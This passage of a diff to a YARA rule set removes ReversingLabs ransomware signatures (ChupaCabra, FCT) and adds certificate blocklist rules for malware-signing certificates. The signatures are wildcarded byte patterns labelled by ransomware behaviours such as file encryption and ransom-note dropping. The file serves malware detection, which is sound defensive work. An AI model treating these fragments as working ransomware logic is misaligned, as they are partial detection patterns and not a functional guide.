-            ?? 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ??
-            ?? ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ??
-            02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 02 7B ?? ??
-            ?? ?? 1F 09 FE 02 16 FE 01 13 04 11 04 2D ?? 02 7B ?? ?? ?? ?? 02 7C ?? ?? ??
-            ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 2B ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 02
-            7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 2A
-        }
-		$unzip_packed_file = {
-            28 ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 0B 06 07 2E ?? 07 06 28 ?? ?? ?? ?? 2D ?? 14
-            2A 02 73 ?? ?? ?? ?? 0C 16 8D ?? ?? ?? ?? 0D 08 6F ?? ?? ?? ?? 13 04 11 04 20
-            ?? ?? ?? ?? 40 ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 68 13 05 08 6F ?? ?? ?? ?? 13 06
-            08 6F ?? ?? ?? ?? 13 07 11 04 20 ?? ?? ?? ?? 33 ?? 11 05 1F 14 33 ?? 11 06 2D
-            ?? 11 07 1E 2E ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 08 6F ?? ?? ?? ?? 26 08 6F
-            ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 13 08 08 6F ?? ?? ?? ??
-            13 09 08 6F ?? ?? ?? ?? 13 0A 11 09 16 31 ?? 11 09 8D ?? ?? ?? ?? 13 0B 08 11
-            0B 16 11 09 6F ?? ?? ?? ?? 26 11 0A 16 31 ?? 11 0A 8D ?? ?? ?? ?? 13 0C 08 11
-            0C 16 11 0A 6F ?? ?? ?? ?? 26 08 6F ?? ?? ?? ?? 08 6F ?? ?? ?? ?? 59 D4 8D ??
-            ?? ?? ?? 13 0D 08 11 0D 16 11 0D 8E 69 6F ?? ?? ?? ?? 26 11 0D 73 ?? ?? ?? ??
-            13 0E 11 08 8D ?? ?? ?? ?? 0D 11 0E 09 16 09 8E 69 6F ?? ?? ?? ?? 26 14 13 0D
-            38 ?? ?? ?? ?? 11 04 1F 18 63 13 0F 11 04 11 0F 1F 18 62 59 13 04 11 04 20 ??
-            ?? ?? ?? 40 ?? ?? ?? ?? 11 0F 17 33 ?? 08 6F ?? ?? ?? ?? 13 10 11 10 8D ?? ??
-            ?? ?? 0D 16 13 11 2B ?? 08 6F ?? ?? ?? ?? 13 12 08 6F ?? ?? ?? ?? 13 13 11 12
-            8D ?? ?? ?? ?? 13 15 08 11 15 16 11 15 8E 69 6F ?? ?? ?? ?? 26 11 15 73 ?? ??
-            ?? ?? 13 14 11 14 09 11 11 11 13 6F ?? ?? ?? ?? 26 11 11 11 13 58 13 11 11 11
-            11 10 32 ?? 11 0F 18 33 ?? 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            13 16 1E 8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 17 11 16 11 17 17
-            28 ?? ?? ?? ?? 13 18 11 18 02 1A 02 8E 69 1A 59 6F ?? ?? ?? ?? 13 19 11 19 28
-            ?? ?? ?? ?? 0D DE ?? 11 18 2C ?? 11 18 6F ?? ?? ?? ?? DC 11 0F 19 33 ?? 1F 10
-            8D ?? ?? ?? ?? 25 D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 1A 1F 10 8D ?? ?? ?? ?? 25
-            D0 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 1B 11 1A 11 1B 17 28 ?? ?? ?? ?? 13 1C 11 1C
-            02 1A 02 8E 69 1A 59 6F ?? ?? ?? ?? 13 1D 11 1D 28 ?? ?? ?? ?? 0D DE 17 11 1C
-            2C ?? 11 1C 6F ?? ?? ?? ?? DC 72 B5 0E 00 70 73 ?? ?? ?? ?? 7A 08 6F ?? ?? ??
-            ?? 14 0C 09 2A
-        }
-		$resolve_assembly = {
-            12 00 03 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 12 00 16 28 ?? ?? ?? ?? 0B 28 ?? ?? ?? ?? 07
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 72 ?? ?? ?? ?? 17 8D ?? ?? ?? ?? 13 13 11 13 16 1F
-            2C 9D 11 13 6F ?? ?? ?? ?? 0D 7E ?? ?? ?? ?? 13 04 16 13 05 16 13 06 16 13 07 2B ??
-            09 11 07 9A 08 28 ?? ?? ?? ?? 2C 0A 09 11 07 17 58 9A 13 04 2B ?? 11 07 18 58 13 07
-            11 07 09 8E 69 17 59 32 ?? 11 04 6F ?? ?? ?? ?? 2D ?? 12 00 7B ?? ?? ?? ?? 6F ?? ??
-            ?? ?? 2D ?? 28 ?? ?? ?? ?? 12 00 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 16
-            13 08 2B ?? 09 11 08 9A 08 28 ?? ?? ?? ?? 2C ?? 09 11 08 17 58 9A 13 04 2B ?? 11 08
-            18 58 13 08 11 08 09 8E 69 17 59 32 ?? 11 04 6F ?? ?? ?? ?? 16 3E ?? ?? ?? ?? 11 04
-            16 6F ?? ?? ?? ?? 1F 5B 33 ?? 11 04 1F 5D 6F ?? ?? ?? ?? 13 09 11 04 17 11 09 17 59
-            6F ?? ?? ?? ?? 13 0A 11 0A 1F 7A 6F ?? ?? ?? ?? 16 FE 04 16 FE 01 13 05 11 0A 1F 74
-            6F ?? ?? ?? ?? 16 FE 04 16 FE 01 13 06 11 04 11 09 17 58 6F ?? ?? ?? ?? 13 04 7E ??
-            ?? ?? ?? 25 13 14 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 11 04 6F ?? ?? ?? ?? 2C ?? 7E ?? ??
-            ?? ?? 11 04 6F ?? ?? ?? ?? 13 12 DD ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 04 6F ?? ?? ?? ??
-            13 0B 11 0B 39 ?? ?? ?? ?? 11 0B 6F ?? ?? ?? ?? 69 13 0C 11 0C 8D ?? ?? ?? ?? 13 0D
-            11 0B 11 0D 16 11 0C 6F ?? ?? ?? ?? 26 11 05 2C ?? 11 0D 28 ?? ?? ?? ?? 13 0D 14 13
-            0E 11 06 2D ?? 11 0D 28 ?? ?? ?? ?? 13 0E DE 0C 26 17 13 06 DE ?? 26 17 13 06 DE ??
-            11 06 2C ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 04 28 ?? ?? ?? ?? 13 0F 11 0F 28 ?? ??
-            ?? ?? 26 11 0F 12 00 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 10 11 10 28 ??
-            ?? ?? ?? 2D ?? 11 10 28 ?? ?? ?? ?? 13 11 11 11 11 0D 16 11 0D 8E 69 6F ?? ?? ?? ??
-            11 11 6F ?? ?? ?? ?? 11 10 14 1A 28 ?? ?? ?? ?? 26 11 0F 14 1A 28 ?? ?? ?? ?? 26 11
-            10 28 ?? ?? ?? ?? 13 0E DE ?? 26 DE ?? 7E ?? ?? ?? ?? 11 04 11 0E 6F ?? ?? ?? ?? 11
-            0E 13 12 DE ?? DE ?? 11 14 28 ?? ?? ?? ?? DC 14 2A 11 12 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $call_encrypt and $encrypt_files and $start_process ) or ( $msgbox_timer ) or ( $unzip_packed_file and $resolve_assembly ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dialer Access" and pe.signatures [ i ] . serial == "09:54:a3:c8:76:df:92:62:cd:e5:81:7f:98:70:f0:c6" and 1160438400 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Chupacabra : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_3C30930E53Bb026F9A5D7440155F7118 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects ChupaCabra ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "e44a101d-53c3-51f2-84ca-f6a5858c169b"
-		date = "2021-10-12"
-		modified = "2021-10-12"
+		id = "ad7d8be0-ecb1-508f-bfce-7a5cecfd4e2f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/ByteCode.MSIL.Ransomware.ChupaCabra.yara#L1-L90"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7f247778e0bd8057670abf42b2d1011ebae891ffcb21ebad50060f9a7986bf93"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13022-L13038"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "260a58669043d21ee0ffccbdee95c9d04ef338497685d42f1951660f658a164d"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "ChupaCabra"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_p1 = {
-            7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 7E ?? ?? ?? ?? 28
-            ?? ?? ?? ?? 2C ?? 72 ?? ?? ?? ?? 73 ?? ?? ?? ?? 7A 14 0A 14 0B 7E ?? ?? ?? ?? 7E ?? ??
-            ?? ?? 73 ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 09 73 ?? ?? ?? ?? 13 ?? 73 ??
-            ?? ?? ?? 0A 06 08 06 6F ?? ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 06 11 ?? 28 ??
-            ?? ?? ?? 6F ?? ?? ?? ?? 06 06 6F ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11
-            ?? 11 ?? 16 73 ?? ?? ?? ?? 13 ?? 11 ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 6F ?? ?? ?? ?? 0B DE
-            ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 11 ?? 2C ??
-            11 ?? 6F ?? ?? ?? ?? DC 06 2C ?? 06 6F ?? ?? ?? ?? DC 07 2A
-        }
-		$encrypt_files_p2 = {
-            02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 02 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 0A 02 06 28 ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 38 ?? ??
-            ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 20 ?? ?? ?? ?? 8D ?? ??
-            ?? ?? 0B 02 19 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 0D 09 07 09 8E 69 28 ?? ?? ?? ?? DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? DC 02 19 28
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 07 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
-            ?? ?? ?? DC 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DD ?? ?? ?? ?? 26 02 28
-            ?? ?? ?? ?? 13 ?? 11 ?? 17 5F 17 33 ?? 11 ?? 17 28 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ??
-            ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 02 28 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 38 ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6A 30 ?? 20 ?? ?? ??
-            ?? 8D ?? ?? ?? ?? 13 ?? 02 19 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 20 ?? ?? ?? ??
-            6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ?? ?? DC 02 19 28
-            ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F
-            ?? ?? ?? ?? DC 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? DE ?? DE ?? 26 DE ??
-            2A
-        }
-		$find_files_p1 = {
-            02 28 ?? ?? ?? ?? 0A 02 28 ?? ?? ?? ?? 0B 16 0C 2B ?? 06 08 9A 28 ?? ?? ?? ?? 72 ?? ??
-            ?? ?? 6F ?? ?? ?? ?? 2D ?? 06 08 9A 28 ?? ?? ?? ?? 08 17 58 0C 08 06 8E 69 32 ?? 16 0D
-            2B ?? 07 09 9A 28 ?? ?? ?? ?? 09 17 58 0D 09 07 8E 69 32 ?? DE ?? 26 DE ?? 2A
-        }
-		$find_files_p2 = {
-            72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 3A ?? ?? ??
-            ?? 1F ?? 8D ?? ?? ?? ?? 25 16 1E 28 ?? ?? ?? ?? A2 25 17 1F ?? 28 ?? ?? ?? ?? A2 25 18
-            1F ?? 28 ?? ?? ?? ?? A2 25 19 1F ?? 28 ?? ?? ?? ?? A2 25 1A 1F ?? 28 ?? ?? ?? ?? A2 25
-            1B 1B 28 ?? ?? ?? ?? A2 25 1C 1C 28 ?? ?? ?? ?? A2 25 1D 1F ?? 28 ?? ?? ?? ?? A2 25 1E
-            1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ??
-            A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1B 28 ??
-            ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ??
-            1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F ?? 28 ?? ?? ?? ??
-            A2 0A 16 0B 2B ?? 06 07 9A 28 ?? ?? ?? ?? 07 17 58 0B 07 06 8E 69 32 ?? 2A
-        }
-		$drop_ransom_note = {
-            7E ?? ?? ?? ?? 2C ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 39 ?? ?? ?? ?? 20 ?? ?? ?? ?? 28 ??
-            ?? ?? ?? 28 ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ??
-            ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 7E ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 7E
-            ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 20
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25 17 7E ?? ?? ??
-            ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 7E ?? ?? ?? ?? A2 25 1A 72 ?? ?? ?? ?? A2 28 ?? ??
-            ?? ?? 28 ?? ?? ?? ?? 26 1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ??
-            ?? 26 73 ?? ?? ?? ?? 0A 7E ?? ?? ?? ?? 0B 06 07 6F ?? ?? ?? ?? 26 2A
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CPM Media, Ltd." and pe.signatures [ i ] . serial == "3c:30:93:0e:53:bb:02:6f:9a:5d:74:40:15:5f:71:18" and 1064534400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_432Eefc0D4Dc0326Eb277A518Cc4310A : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "eeccb477-0bf7-5b79-94df-710e6e0db78f"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13040-L13056"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d5a0b7f19f66f18b5ef1c548276b675ead74fed6be94310c303bfad6c85f18be"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) ) and ( $drop_ransom_note )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "43:2e:ef:c0:d4:dc:03:26:eb:27:7a:51:8c:c4:31:0a" and 1466121600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_FCT : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_470D6Ce21A6940320261F09E : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects FCT ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ea3d5514-d6f2-5fd0-9247-a3f6b920d8d9"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "00b92b5d-59e3-5aae-954d-a90bd8cc1370"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.FCT.yara#L1-L86"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "b158ad56c92a926f7398a27b3576c259e39c9716ef192fa5944ce3cffdc6d7d0"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13058-L13074"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "cae1d381bf2018a0ce56feb245d01f2bfea55b67894264d32d78dbb41873c792"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "FCT"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ??
-            ?? ?? 83 7D ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 45 ?? 51 50 FF 15 ?? ?? ?? ?? 89
-            85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 6A ?? 51 8D 4D ?? C7 45 ?? ?? ?? ?? ?? C7
-            45 ?? ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 33 DB 8B 55 ?? 33 C9 8B 75
-            ?? 89 9D ?? ?? ?? ?? 85 D2 74 ?? 66 90 83 7D ?? ?? 8D 45 ?? 0F 43 C6 0F BE 04 08 41
-            03 D8 3B CA 72 ?? 89 9D ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? 66 83 BD ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 8B CF C7 45 ?? ?? ?? ?? ?? 33 C0
-            C7 45 ?? ?? ?? ?? ?? 66 89 45 ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1
-            F9 51 57 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 8B 75 ?? 8B C6 8B 55 ?? 2B C2 83 F8 ??
-            72 ?? 83 FE ?? 8D 45 ?? 8D 4A ?? BB ?? ?? ?? ?? 0F 43 45 ?? 89 4D ?? 66 89 1C 50 33
-            D2 66 89 14 48 EB ?? 6A ?? 68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ??
-            ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51
-        }
-		$find_files_p2 = {
-            52 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8B 55 ?? 83 FA ?? 72 ?? 8B 4D ?? 8D 14 55
-            ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83 C2 ?? 2B C1 83 C0 ?? 83 F8 ??
-            0F 87 ?? ?? ?? ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
-            50 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 8B BD ?? ?? ?? ?? E9 ?? ?? ?? ?? 53 FF 15 ?? ??
-            ?? ?? 8B 45 ?? 83 F8 ?? 72 ?? 8B 55 ?? 8D 48 ?? 8B C2 81 F9 ?? ?? ?? ?? 72 ?? 8B 52
-            ?? 83 C1 ?? 2B C2 83 C0 ?? 83 F8 ?? 77 ?? 51 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 83
-            FA ?? 72 ?? 8B 4D ?? 8D 14 55 ?? ?? ?? ?? 8B C1 81 FA ?? ?? ?? ?? 72 ?? 8B 49 ?? 83
-            C2 ?? 2B C1 83 C0 ?? 83 F8 ?? 77 ?? 52 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 64 89 0D
-            ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 E8
-        }
-		$encrypt_files_p1 = {
-            66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 51 57 8D 4D ?? E8 ?? ?? ?? ?? C6 45 ??
-            ?? 8B 75 ?? 8B C6 8B 55 ?? 2B C2 83 F8 ?? 72 ?? 83 FE ?? 8D 45 ?? 8D 4A ?? BB ?? ??
-            ?? ?? 0F 43 45 ?? 89 4D ?? 66 89 1C 50 33 D2 66 89 14 48 EB ?? 6A ?? 68 ?? ?? ?? ??
-            C6 85 ?? ?? ?? ?? ?? 8D 4D ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ??
-            ?? 8D 51 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 8B 5D ?? 2B CA 8B 55 ?? 8B C3 D1 F9 2B
-            C2 3B C8 77 ?? 83 FB ?? 8D 04 09 50 8D 75 ?? 0F 43 75 ?? 8D 85 ?? ?? ?? ?? 50 8D 3C
-            0A 89 7D ?? 8D 04 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 51 8D 85 ??
-            ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 81 BD
-            ?? ?? ?? ?? ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 6A ?? 0F 43 45 ?? 68
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 0F
-            84 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B F2 85 F6 74
-        }
-		$encrypt_files_p2 = {
-            6A ?? 8D 45 ?? 50 A1 ?? ?? ?? ?? 2B C6 56 03 C1 50 57 FF 15 ?? ?? ?? ?? 2B 75 ?? 74
-            ?? 8B 8D ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? C6 45 ?? ?? 33 C0 8B 9D ?? ?? ?? ??
-            BA ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? 83 CB ?? 8B 45 ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ??
-            89 95 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 8D 48 ?? 3B CA 76 ?? C6 85 ?? ?? ?? ?? ?? FF B5
-            ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 95 ?? ?? ?? ?? C7 85 ??
-            ?? ?? ?? ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 0F 43 4D ?? 3B C2 77 ?? 8D 34 00 89 85 ??
-            ?? ?? ?? 83 FA ?? 8D BD ?? ?? ?? ?? 56 0F 43 BD ?? ?? ?? ?? 51 57 E8 ?? ?? ?? ?? 83
-            C4 ?? 33 C0 66 89 04 37 EB ?? 50 51 C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ??
-            ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8B C2 8B 8D ?? ?? ?? ?? 2B C1 83 F8 ??
-            72 ?? 83 FA ?? 8D B5 ?? ?? ?? ?? 6A ?? 0F 43 B5 ?? ?? ?? ?? 8D 79 ?? 68 ?? ?? ?? ??
-            89 BD ?? ?? ?? ?? 8D 04 4E 50 E8 ?? ?? ?? ?? 83 C4 ?? 33 C0 66 89 04 7E EB ?? 6A ??
-            68 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 6A ?? E8 ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 45 ?? 0F 43 8D ?? ?? ?? ?? 83 7D
-            ?? ?? 51 0F 43 45 ?? 50 FF 15
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VANKY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "47:0d:6c:e2:1a:69:40:32:02:61:f0:9e" and 1474523038 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_7E6Bc7E5A49E2C28E6F5D042 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "a7b815d9-e247-5de1-9bcb-96294b3b91c0"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L13076-L13092"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f378c490ff4f32fc095c822f75abac44a8d94327404cd97546c63e7441e07632"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( all of ( $find_files_p* ) ) and ( all of ( $encrypt_files_p* ) )
